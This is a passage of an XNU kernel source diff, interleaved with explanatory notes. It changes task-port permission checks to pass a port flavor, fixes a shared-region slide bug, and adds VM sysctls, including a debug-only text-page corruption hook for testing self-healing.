                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
@@ -931,7 +938,7 @@ task_for_pid(
        p = PROC_NULL;
 
 #if CONFIG_MACF
-       error = mac_proc_check_get_task(kauth_cred_get(), &pident);
+       error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_CONTROL);
        if (error) {
                error = KERN_FAILURE;
                goto tfpout;
@@ -949,7 +956,8 @@ task_for_pid(
                }
 
                /* Call up to the task access server */
-               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                   proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL);
 
                if (error != MACH_MSG_SUCCESS) {
                        if (error == MACH_RCV_INTERRUPTED) {
@@ -963,7 +971,13 @@ task_for_pid(
 
        /* Grant task port access */
        extmod_statistics_incr_task_for_pid(task);
-       sright = (void *) convert_task_to_port(task);
+
+       if (task == current_task()) {
+               /* return pinned self if current_task() so equality check with mach_task_self_ passes */
+               sright = (void *)convert_task_to_port_pinned(task);
+       } else {
+               sright = (void *)convert_task_to_port(task);
+       }
 
        /* Check if the task has been corpsified */
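From this point on, each task_for_pid-style entry point identifies which port flavor it is requesting: mac_proc_check_get_task() and the taskgated upcall both gain a mach_task_flavor_t argument (TASK_FLAVOR_CONTROL here, _READ/_INSPECT/_NAME in the later hunks), and a caller targeting itself now receives a pinned port so the result compares equal to mach_task_self(). A small sketch of the hook call as these hunks use it; the wrapper function is illustrative, the hook signature mirrors the calls above:

    #if CONFIG_MACF
    /* flavor is one of TASK_FLAVOR_CONTROL, _READ, _INSPECT, _NAME */
    static int
    example_check_get_task(struct proc_ident *pident, mach_task_flavor_t flavor)
    {
            return mac_proc_check_get_task(kauth_cred_get(), pident, flavor);
    }
    #endif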
        if (is_corpsetask(task)) {
@@ -1019,9 +1033,9 @@ task_name_for_pid(
        mach_port_name_t        target_tport = args->target_tport;
        int                     pid = args->pid;
        user_addr_t             task_addr = args->t;
-       proc_t          p = PROC_NULL;
-       task_t          t1;
-       mach_port_name_t        tret;
+       proc_t                  p = PROC_NULL;
+       task_t                  t1 = TASK_NULL;
+       mach_port_name_t        tret = MACH_PORT_NULL;
        void * sright;
        int error = 0, refheld = 0;
        kauth_cred_t target_cred;
@@ -1032,7 +1046,7 @@ task_name_for_pid(
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
@@ -1057,7 +1071,7 @@ task_name_for_pid(
                                proc_rele(p);
                                p = PROC_NULL;
 #if CONFIG_MACF
-                               error = mac_proc_check_get_task_name(kauth_cred_get(), &pident);
+                               error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_NAME);
                                if (error) {
                                        task_deallocate(task);
                                        goto noperm;
@@ -1122,13 +1136,13 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args *
 
        /* Disallow inspect port for kernel_task */
        if (pid == 0) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                return EPERM;
        }
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *) &t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *) &tret, task_addr, sizeof(mach_port_name_t));
                return EINVAL;
        }
 
@@ -1158,12 +1172,8 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args *
        proc_rele(proc);
        proc = PROC_NULL;
 
-       /*
-        * For now, it performs the same set of permission checks as task_for_pid. This
-        * will be addressed in rdar://problem/53478660
-        */
 #if CONFIG_MACF
-       error = mac_proc_check_get_task(kauth_cred_get(), &pident);
+       error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_INSPECT);
        if (error) {
                error = EPERM;
                goto tifpout;
@@ -1182,7 +1192,8 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args *
 
 
                /* Call up to the task access server */
-               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                   proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_INSPECT);
 
                if (error != MACH_MSG_SUCCESS) {
                        if (error == MACH_RCV_INTERRUPTED) {
@@ -1247,13 +1258,13 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args,
 
        /* Disallow read port for kernel_task */
        if (pid == 0) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                return EPERM;
        }
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *) &t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                return EINVAL;
        }
 
@@ -1283,12 +1294,8 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args,
        proc_rele(proc);
        proc = PROC_NULL;
 
-       /*
-        * For now, it performs the same set of permission checks as task_for_pid. This
-        * will be addressed in rdar://problem/53478660
-        */
 #if CONFIG_MACF
-       error = mac_proc_check_get_task(kauth_cred_get(), &pident);
+       error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_READ);
        if (error) {
                error = EPERM;
                goto trfpout;
@@ -1307,7 +1314,8 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args,
 
 
                /* Call up to the task access server */
-               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                   proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_READ);
 
                if (error != MACH_MSG_SUCCESS) {
                        if (error == MACH_RCV_INTERRUPTED) {
@@ -1382,7 +1390,7 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret)
 #endif
 
        target = targetproc->task;
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (target != TASK_NULL) {
                /* If we aren't root and target's task access port is set... */
                if (!kauth_cred_issuser(kauth_cred_get()) &&
@@ -1395,7 +1403,8 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret)
                        }
 
                        /* Call up to the task access server */
-                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                           proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL);
 
                        if (error != MACH_MSG_SUCCESS) {
                                if (error == MACH_RCV_INTERRUPTED) {
@@ -1407,7 +1416,7 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret)
                        }
                }
        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
        task_reference(target);
        error = task_pidsuspend(target);
@@ -1460,14 +1469,14 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args)
 
        /* Always check if pid == 0 */
        if (pid == 0) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
@@ -1505,7 +1514,7 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args)
 
        if (!IOTaskHasEntitlement(current_task(), DEBUG_PORT_ENTITLEMENT)) {
 #if CONFIG_MACF
-               error = mac_proc_check_get_task(kauth_cred_get(), &pident);
+               error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_CONTROL);
                if (error) {
                        error = KERN_FAILURE;
                        goto tfpout;
@@ -1524,7 +1533,8 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args)
 
 
                        /* Call up to the task access server */
-                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                           proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL);
 
                        if (error != MACH_MSG_SUCCESS) {
                                if (error == MACH_RCV_INTERRUPTED) {
@@ -1607,7 +1617,7 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret)
 #endif
 
        target = targetproc->task;
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (target != TASK_NULL) {
                /* If we aren't root and target's task access port is set... */
                if (!kauth_cred_issuser(kauth_cred_get()) &&
@@ -1620,7 +1630,8 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret)
                        }
 
                        /* Call up to the task access server */
-                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                           proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL);
 
                        if (error != MACH_MSG_SUCCESS) {
                                if (error == MACH_RCV_INTERRUPTED) {
@@ -1632,7 +1643,7 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret)
                        }
                }
        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 #if !XNU_TARGET_OS_OSX
 #if SOCKETS
@@ -1675,7 +1686,7 @@ out:
        return error;
 }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 /*
  * Freeze the specified process (provided in args->pid), or find and freeze a PID.
  * When a process is specified, this call is blocking, otherwise we wake up the
@@ -1737,7 +1748,7 @@ out:
        *ret = error;
        return error;
 }
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #if SOCKETS
 int
@@ -1750,7 +1761,7 @@ networking_memstatus_callout(proc_t p, uint32_t status)
         * proc lock NOT held
         * a reference on the proc has been held / shall be dropped by the caller.
         */
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
        LCK_MTX_ASSERT(&p->p_mlock, LCK_MTX_ASSERT_NOTOWNED);
 
        proc_fdlock(p);
@@ -1946,6 +1957,7 @@ shared_region_check_np(
        mach_vm_offset_t        start_address = 0;
        int                     error = 0;
        kern_return_t           kr;
+       task_t                  task = current_task();
 
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: %p [%d(%s)] -> check_np(0x%llx)\n",
@@ -1954,10 +1966,10 @@ shared_region_check_np(
                (uint64_t)uap->start_address));
 
        /* retrieve the current tasks's shared region */
-       shared_region = vm_shared_region_get(current_task());
+       shared_region = vm_shared_region_get(task);
        if (shared_region != NULL) {
                /* retrieve address of its first mapping... */
-               kr = vm_shared_region_start_address(shared_region, &start_address);
+               kr = vm_shared_region_start_address(shared_region, &start_address, task);
                if (kr != KERN_SUCCESS) {
                        error = ENOMEM;
                } else {
@@ -2714,7 +2726,11 @@ done:
  * a max value. The kernel will choose a random value based on that, then use it
  * for all shared regions.
  */
-#define SLIDE_AMOUNT_MASK ~PAGE_MASK
+#if defined (__x86_64__)
+#define SLIDE_AMOUNT_MASK ~FOURK_PAGE_MASK
+#else
+#define SLIDE_AMOUNT_MASK ~SIXTEENK_PAGE_MASK
+#endif
 
 int
 shared_region_map_and_slide_2_np(
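The new SLIDE_AMOUNT_MASK ties shared-region slide granularity to the platform's base page size instead of the kernel map's PAGE_MASK: 4 KiB alignment on x86_64 and 16 KiB on the other (16K-page) targets. A worked example of what the mask does to a candidate slide; the mask values assume FOURK_PAGE_MASK == 0xFFF and SIXTEENK_PAGE_MASK == 0x3FFF, as their names suggest:

    uint32_t requested   = 0x12345;               /* candidate slide from the max-slide range */
    uint32_t x86_slide   = requested & ~0xFFFU;   /* 0x12000: 4 KiB aligned  */
    uint32_t arm64_slide = requested & ~0x3FFFU;  /* 0x10000: 16 KiB aligned */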
@@ -2827,7 +2843,7 @@ shared_region_map_and_slide_2_np(
                                }
                                mappings[m].sms_address += slide_amount;
                                if (mappings[m].sms_slide_size != 0) {
-                                       mappings[i].sms_slide_start += slide_amount;
+                                       mappings[m].sms_slide_start += slide_amount;
                                }
                        }
                }
@@ -2894,19 +2910,8 @@ static int vm_mixed_pagesize_supported = 0;
 SYSCTL_INT(_debug, OID_AUTO, vm_mixed_pagesize_supported, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED,
     &vm_mixed_pagesize_supported, 0, "kernel support for mixed pagesize");
 
-
-extern uint64_t get_pages_grabbed_count(void);
-
-static int
-pages_grabbed SYSCTL_HANDLER_ARGS
-{
-#pragma unused(arg1, arg2, oidp)
-       uint64_t value = get_pages_grabbed_count();
-       return SYSCTL_OUT(req, &value, sizeof(value));
-}
-
-SYSCTL_PROC(_vm, OID_AUTO, pages_grabbed, CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED,
-    0, 0, &pages_grabbed, "QU", "Total pages grabbed");
+SCALABLE_COUNTER_DECLARE(vm_page_grab_count);
+SYSCTL_SCALABLE_COUNTER(_vm, pages_grabbed, vm_page_grab_count, "Total pages grabbed");
 SYSCTL_ULONG(_vm, OID_AUTO, pages_freed, CTLFLAG_RD | CTLFLAG_LOCKED,
     &vm_pageout_vminfo.vm_page_pages_freed, "Total pages freed");
 
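The pages_grabbed statistic no longer round-trips through a SYSCTL_PROC handler and get_pages_grabbed_count(); it is published straight from the per-CPU vm_page_grab_count counter via SYSCTL_SCALABLE_COUNTER. A sketch of exposing a statistic the same way, assuming the SCALABLE_COUNTER_DEFINE and counter_inc entry points of the counter API this release introduces (see osfmk/kern/counter.h); the counter name and update site are illustrative:

    #include <kern/counter.h>

    SCALABLE_COUNTER_DEFINE(example_events);      /* per-CPU counter, no lock needed */
    SYSCTL_SCALABLE_COUNTER(_vm, example_events, example_events,
        "illustrative event count");

    static void
    example_event_happened(void)
    {
            counter_inc(&example_events);         /* cheap local increment on the hot path */
    }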
@@ -3344,6 +3349,47 @@ extern int pmap_ledgers_panic_leeway;
 SYSCTL_INT(_vm, OID_AUTO, pmap_ledgers_panic_leeway, CTLFLAG_RW | CTLFLAG_LOCKED, &pmap_ledgers_panic_leeway, 0, "");
 #endif /* MACH_ASSERT */
 
+
+extern uint64_t vm_map_lookup_locked_copy_slowly_count;
+extern uint64_t vm_map_lookup_locked_copy_slowly_size;
+extern uint64_t vm_map_lookup_locked_copy_slowly_max;
+extern uint64_t vm_map_lookup_locked_copy_slowly_restart;
+extern uint64_t vm_map_lookup_locked_copy_slowly_error;
+extern uint64_t vm_map_lookup_locked_copy_strategically_count;
+extern uint64_t vm_map_lookup_locked_copy_strategically_size;
+extern uint64_t vm_map_lookup_locked_copy_strategically_max;
+extern uint64_t vm_map_lookup_locked_copy_strategically_restart;
+extern uint64_t vm_map_lookup_locked_copy_strategically_error;
+extern uint64_t vm_map_lookup_locked_copy_shadow_count;
+extern uint64_t vm_map_lookup_locked_copy_shadow_size;
+extern uint64_t vm_map_lookup_locked_copy_shadow_max;
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_count,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_count, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_size,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_size, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_max,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_max, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_restart,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_restart, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_error,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_error, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_count,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_count, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_size,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_size, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_max,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_max, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_restart,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_restart, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_error,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_error, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_count,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_count, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_size,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_size, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_max,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_max, "");
+
 extern int vm_protect_privileged_from_untrusted;
 SYSCTL_INT(_vm, OID_AUTO, protect_privileged_from_untrusted,
     CTLFLAG_RW | CTLFLAG_LOCKED, &vm_protect_privileged_from_untrusted, 0, "");
@@ -3416,8 +3462,84 @@ SYSCTL_PROC(_vm, OID_AUTO, shared_region_pivot,
     CTLTYPE_INT | CTLFLAG_WR | CTLFLAG_LOCKED,
     0, 0, shared_region_pivot, "I", "");
 
-extern int vm_remap_old_path, vm_remap_new_path;
-SYSCTL_INT(_vm, OID_AUTO, remap_old_path,
-    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_remap_old_path, 0, "");
-SYSCTL_INT(_vm, OID_AUTO, remap_new_path,
-    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_remap_new_path, 0, "");
+/*
+ * sysctl to return the number of pages on retired_pages_object
+ */
+static int
+retired_pages_count SYSCTL_HANDLER_ARGS
+{
+#pragma unused(arg1, arg2, oidp)
+       extern uint32_t vm_retired_pages_count(void);
+       uint32_t value = vm_retired_pages_count();
+
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+SYSCTL_PROC(_vm, OID_AUTO, retired_pages_count, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED,
+    0, 0, &retired_pages_count, "I", "");
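A small user-space reader for the new OID could look like the following; this is illustrative only and assumes the node is visible on the running build:

    #include <sys/sysctl.h>
    #include <stdint.h>
    #include <stdio.h>

    int
    main(void)
    {
            uint32_t count = 0;
            size_t len = sizeof(count);

            if (sysctlbyname("vm.retired_pages_count", &count, &len, NULL, 0) == 0) {
                    printf("retired pages: %u\n", count);
            }
            return 0;
    }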
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_total, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_total, 0, "total text page corruptions detected");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_undiagnosed, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_undiagnosed, 0, "undiagnosed text page corruptions");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_not_eligible, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_not_eligible, 0, "text page corruptions not eligible for correction");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_copyin_fail, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_copyin_fail, 0, "undiagnosed text page corruptions due to copyin failure");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_not_found, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_not_found, 0, "text page corruptions but no diff found");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_one_bit_flip, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_one_bit_flip, 0, "text page corruptions that had a single bit flip");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_1_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[0], 0, "text page corruptions with 1 changed byte");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_2_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[1], 0, "text page corruptions with 2 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_4_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[2], 0, "text page corruptions with 3 to 4 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_8_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[3], 0, "text page corruptions with 5 to 8 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_16_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[4], 0, "text page corruptions with 9 to 16 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_32_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[5], 0, "text page corruptions with 17 to 32 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_64_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[6], 0, "text page corruptions with 33 to 64 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_128byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[7], 0, "text page corruptions with 65 to 128 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_256_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[8], 0, "text page corruptions with >128 changed bytes");
+
+#if DEBUG || DEVELOPMENT
+/*
+ * A sysctl that can be used to corrupt a text page with an illegal instruction.
+ * Used for testing text page self healing.
+ */
+extern kern_return_t vm_corrupt_text_addr(uintptr_t);
+static int
+corrupt_text_addr(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req)
+{
+       uint64_t value = 0;
+       int error = sysctl_handle_quad(oidp, &value, 0, req);
+       if (error || !req->newptr) {
+               return error;
+       }
+
+       if (vm_corrupt_text_addr((uintptr_t)value) == KERN_SUCCESS) {
+               return 0;
+       } else {
+               return EINVAL;
+       }
+}
+
+SYSCTL_PROC(_vm, OID_AUTO, corrupt_text_addr,
+    CTLTYPE_QUAD | CTLFLAG_WR | CTLFLAG_LOCKED | CTLFLAG_MASKED,
+    0, 0, corrupt_text_addr, "-", "");
+#endif /* DEBUG || DEVELOPMENT */
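Because the OID is write-only and CTLFLAG_MASKED, it is hidden from sysctl -a; a test would poke it roughly as sketched below. The address is purely hypothetical, and the OID only exists on DEBUG and DEVELOPMENT kernels:

    #include <sys/sysctl.h>
    #include <stdint.h>
    #include <stdio.h>

    int
    main(void)
    {
            uint64_t addr = 0x100004000ULL;   /* hypothetical text address to corrupt */

            if (sysctlbyname("vm.corrupt_text_addr", NULL, NULL, &addr, sizeof(addr)) != 0) {
                    perror("vm.corrupt_text_addr");
            }
            return 0;
    }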
index b4d6d6fc64792c56b69765c15d97f036718b1aeb..fc3426fd5976c661098acdda09a13b303fc6f683 100644 (file)
@@ -56,7 +56,6 @@
 
 #include <mach/mach_types.h>
 #include <mach/memory_object_types.h>
-#include <mach/memory_object_control.h>
 #include <mach/vm_map.h>
 #include <mach/mach_vm.h>
 #include <mach/upl.h>
index f439a52cdfb8da4cf973baa8a8f5e7b809a55f35..fc2945bab4c5959d8fea2ddf90c9d88cd5c2880d 100644 (file)
@@ -569,7 +569,6 @@ _sysctl__machdep_children
 _sysctl__net_children
 _sysctl__sysctl_children
 _sysctl__vfs_children
-_sysctl__vfs_generic
 _sysctl__vfs_generic_children
 _sysctl__vm_children
 _sysctl_handle_int
index cdf84e788d81f03df524110b0ba299c0c2d3b952..f782bc54055857527391a81e437ef8209bd3620a 100644 (file)
@@ -880,6 +880,7 @@ __ZN18IOMemoryDescriptor13removeMappingEP11IOMemoryMap
 __ZN18IOMemoryDescriptor15getDMAMapLengthEPy
 __ZN18IOMemoryDescriptor15getDescriptorIDEv
 __ZN18IOMemoryDescriptor16getPreparationIDEv
+__ZN18IOMemoryDescriptor16setPreparationIDEv
 __ZN18IOMemoryDescriptor17_CopyState_InvokeE5IORPCP15OSMetaClassBasePFiS2_P17_IOMDPrivateStateE
 __ZN18IOMemoryDescriptor18getPhysicalAddressEv
 __ZN18IOMemoryDescriptor20CreateMapping_InvokeE5IORPCP15OSMetaClassBasePFiS2_yyyyyPP11IOMemoryMapE
@@ -1341,6 +1342,8 @@ __ZN29IOInterleavedMemoryDescriptorD2Ev
 __ZN29IOInterleavedMemoryDescriptordlEPvm
 __ZN29IOInterleavedMemoryDescriptornwEm
 __ZN6IOPMGR10gMetaClassE
+__ZN6IOPMGR13enableCPUCoreEj
+__ZN6IOPMGR13enableCPUCoreEjy
 __ZN6IOPMGRC2EPK11OSMetaClass
 __ZN6IOPMGRD2Ev
 __ZN6IOPMGRdlEPvm
@@ -1473,6 +1476,7 @@ __ZN9IOService20callPlatformFunctionEPKcbPvS2_S2_S2_
 __ZN9IOService20getDeviceMemoryCountEv
 __ZN9IOService20powerOverrideOffPrivEv
 __ZN9IOService20unlockForArbitrationEv
+__ZN9IOService20ClientCrashed_InvokeE5IORPCP15OSMetaClassBasePFiS2_PS_yE
 __ZN9IOService21CopyProperties_InvokeE5IORPCP15OSMetaClassBasePFiS2_PP12OSDictionaryE
 __ZN9IOService21SearchProperty_InvokeE5IORPCP15OSMetaClassBasePFiS2_PKcS4_yPP8OSObjectE
 __ZN9IOService21getClientWithCategoryEPK8OSSymbol
index 8e67942f2c15255448f1b4d2c6988710e0cd478a..eb6d0f4382eaaa40c658cbb270ceb29ba5987841 100644 (file)
@@ -690,6 +690,7 @@ _copyin
 _copyinstr
 _copyout
 _copyoutstr
+_coretrust_interface_register
 _crc32
 _debug_ivars_size
 _deflate
index 3e8381e78a9a3a4bce0050739d44ee6b5cf5d413..8beac4230a07112fcf622debff0028eef60302e3 100644 (file)
@@ -293,9 +293,9 @@ options   CONFIG_MFCTBLSIZ=16                       # <bsmall>
 #
 # configurable kernel message buffer size
 #
-options   CONFIG_MSG_BSIZE_REL=4096            # <msgb_small>
-options   CONFIG_MSG_BSIZE_DEV=4096            # <msgb_small>
-options   CONFIG_MSG_BSIZE_REL=16384           # <msgb_large>
+options   CONFIG_MSG_BSIZE_REL=16384           # <msgb_small>
+options   CONFIG_MSG_BSIZE_DEV=131072          # <msgb_small>
+options   CONFIG_MSG_BSIZE_REL=131072          # <msgb_large>
 options   CONFIG_MSG_BSIZE_DEV=131072          # <msgb_large>
 options   CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_REL        # <!development,debug>
 options   CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_DEV        # <development,debug>
@@ -306,6 +306,12 @@ options   CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_DEV    # <development,debug>
 options   CONFIG_IPC_TABLE_ENTRIES_STEPS=64    # 137898 entries        # <bsmall,small,xsmall>
 options   CONFIG_IPC_TABLE_ENTRIES_STEPS=256   # 300714 entries        # <medium,large,xlarge>
 
+#
+# maximum copyout size for IPC debugging tools
+#
+options CONFIG_IPC_KERNEL_MAP_SIZE=16  # 16M   # <bsmall,small,xsmall>
+options CONFIG_IPC_KERNEL_MAP_SIZE=64  # 64M   # <medium,large,xlarge>
+
 #
 #  configurable kernel - use these options to strip strings from panic
 #  and printf calls.
@@ -573,11 +579,6 @@ options            CONFIG_KAS_INFO         # kas_info support      # <config_kas_info>
 #
 # MACH configuration options.
 #
-# TASK_SWAPPER enables code that manages demand for physical memory by
-#      forcibly suspending tasks when the demand exceeds supply. This
-#      option should be on.
-#
-options                TASK_SWAPPER    #       <task_swapper_disabled>
 
 #
 # This defines configuration options that are normally used only during
@@ -607,7 +608,6 @@ options             MACH_VM_DEBUG   #                               # <debug>
 #      hardclock device driver.
 #
 options                MACH_MP_DEBUG   #                               # <debug>
-options                CONFIG_ZCACHE   # Enable per-cpu caching for zones      # <config_zcache>
